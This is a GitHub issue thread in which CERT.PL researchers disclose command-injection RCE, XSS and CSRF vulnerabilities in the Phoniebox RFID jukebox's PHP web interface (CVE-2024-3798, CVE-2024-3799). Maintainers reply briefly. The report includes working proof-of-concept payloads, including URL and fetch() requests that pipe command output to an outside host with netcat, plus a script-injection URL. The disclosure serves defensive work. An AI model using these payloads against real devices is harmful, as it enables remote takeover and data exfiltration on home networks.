MiczFlor / RPi-Jukebox-RFID

A Raspberry Pi jukebox, playing local music, podcasts, web radio and streams triggered by RFID cards, web app or home automation. All plug and play via USB. GPIO scripts available.
http://phoniebox.de
MIT License

🐛 | RCE/CSRF/XSS vulnerabilities #2342

Open lukigruszka opened 2 months ago

lukigruszka commented 2 months ago

Version

3.5.2 2.6

Branch

develop

OS

Ubuntu

Pi model

NA

Hardware

No response

What happened?

Hello, CERT.PL has found several vulnerabilities while performing a wider scan of open source projects. Since our last issue remained open, we've decided to post details here and reserve CVEs to make the discussion easier. We tested the current state of the develop branch.

As we focus mainly on finding vulnerabilities, we may not be able to assist you in the process of preparing required fixes and/or validate their quality.

RCE/XSS/CSRF (CVE-2024-3798)

GET parameter file handled by htdocs/api/playlist/playsinglefile.php lets you execute commands. POC: http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/api/playlist/playsinglefile.php?file=%27;ls|nc%20web.kazet.cc%203333%20%23

Using the same parameter it's possible to exploit an XSS vulnerability: http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/api/playlist/playsinglefile.php?file=%3Cscript%3Ealert(1);%3C/script%3E

and also CSRF, which results in opening any file an attacker would point to.

RCE (CVE-2024-3799)

Sending a crafted POST request to htdocs/inc.setWifi.php lets you execute commands.

POC: fetch("http://127.0.0.1:8002/RPi-Jukebox-RFID/htdocs/inc.setWifi.php", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": "submitWifi=submit&WIFIssid_ls=lll&WIFIpass_ls=12345678';ls|nc web.kazet.cc 3333; #&WIFIprio_ls=1","method": "POST",}).then((response) => {return response.text(); }).then((data) => {console.log(data);})

While this file should not be directly accessible from the internet, one may think of a scenario where a Jukebox user visits a site with an included JS script, which would send such a request to multiple hosts on the LAN.

Logs

No response

Configuration

No response

More info

No response
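One defensive pattern that addresses all three findings in the report above (shell metacharacters in the `file` parameter, its reflected XSS, and the missing request-origin check), written as an added example that is not part of RPi-Jukebox-RFID; the media root, the CSRF cookie/header names and the player command are assumptions:

```php
<?php
// Added example, not the project's own code: hardened handling of a
// `file` GET parameter. Media root, token names and player command are
// assumptions, not RPi-Jukebox-RFID's real values.
declare(strict_types=1);

const MEDIA_ROOT  = '/var/lib/phoniebox/audio';   // assumed location
const CSRF_COOKIE = 'phoniebox_csrf';             // hypothetical cookie name

// Resolve a user-supplied relative path to a real file strictly inside $root.
function resolveMediaFile(string $requested, string $root): ?string
{
    if ($requested === '' || preg_match('/[\x00-\x1f]/', $requested)) {
        return null;                                  // no NUL / control bytes
    }
    $rootReal = realpath($root);
    $target   = realpath($root . '/' . $requested);   // collapses ../ segments
    if ($rootReal === false || $target === false || !is_file($target)) {
        return null;
    }
    // Prefix check keeps traversal and symlink escapes out of the media root.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Double-submit CSRF check: a custom header must equal the cookie value,
// which a cross-origin <img>/form/fetch from another site cannot supply.
function csrfTokenValid(?string $headerToken, ?string $cookieToken): bool
{
    return $headerToken !== null && $headerToken !== ''
        && $cookieToken !== null && hash_equals($cookieToken, $headerToken);
}

// ---- request handling ----
if (!csrfTokenValid($_SERVER['HTTP_X_CSRF_TOKEN'] ?? null, $_COOKIE[CSRF_COOKIE] ?? null)) {
    http_response_code(403);
    exit('forbidden');
}
$requested = (string)($_GET['file'] ?? '');
$path = resolveMediaFile($requested, MEDIA_ROOT);
header('Content-Type: text/plain; charset=utf-8');
if ($path === null) {
    http_response_code(400);
    // Anything reflected back is HTML-escaped, so a <script> payload stays inert.
    exit('unknown file: ' . htmlspecialchars($requested, ENT_QUOTES, 'UTF-8'));
}
// The path travels as one quoted argument; quotes, ; and | are data, not shell syntax.
exec('mpc add ' . escapeshellarg($path) . ' && mpc play', $out, $rc);   // assumed command
echo $rc === 0 ? 'ok' : 'player error';
```

On PHP 7.4 or newer, passing the command to proc_open() as an array avoids the shell entirely and is preferable to escaping.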

Groovylein commented 2 months ago

@lukigruszka thank you.

Currently we don't have any process for integrating vulnerabilities.

How did you find and catch this project in your process?

lukigruszka commented 2 months ago

We just searched for popular projects on GH and performed a relatively shallow check on them. Surely the scan was not intended to find all possible vulnerabilities, so other ones might exist in this project.

s-martin commented 2 months ago

@lukigruszka the version of Phoniebox is not correct, it's 2.6

lukigruszka commented 2 months ago

Thanks @s-martin for correcting the version, I must admit getting a bit confused by the branching strategy ;-)